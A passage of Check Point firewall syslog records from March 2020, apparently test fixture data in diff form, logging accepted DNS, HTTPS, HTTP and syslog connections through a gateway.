rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57589"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:21:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d5f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524063"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45041"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:21:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d61,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T23:21:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d65,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52366"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:21:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d65,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52367"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T23:21:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d69,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524073"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53115"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:21:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d73,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524083"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53951"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:21:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d69,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524073"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53115"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:21:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d73,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524083"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53951"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:21:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52368"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:21:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d7b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52369"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:21:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d7b,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52370"; service:"443"; service_id:"https"; 
src:"192.168.1.117"] <134>1 2020-03-29T23:21:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d7b,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52371"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T23:21:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d7d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37320"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:21:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d87,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33822"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:21:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d7d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37320"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:21:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d87,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33822"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:21:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d89,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d91,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524113"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33256"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d91,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524113"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33256"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d91,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41064"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d91,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45938"; 
service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10867"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d91,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59070"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d91,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48878"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10868"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d91,0x5,0x353707c7,0xee78a1dc}"; 
origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45207"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:21:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d91,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61262"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10869"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T23:22:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d9b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524123"; 
layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40104"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:22:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d9b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524123"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40104"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:22:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d9d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T23:22:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; 
loguid:"{0x5e812d9d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52372"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:22:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d9d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52373"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T23:22:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; 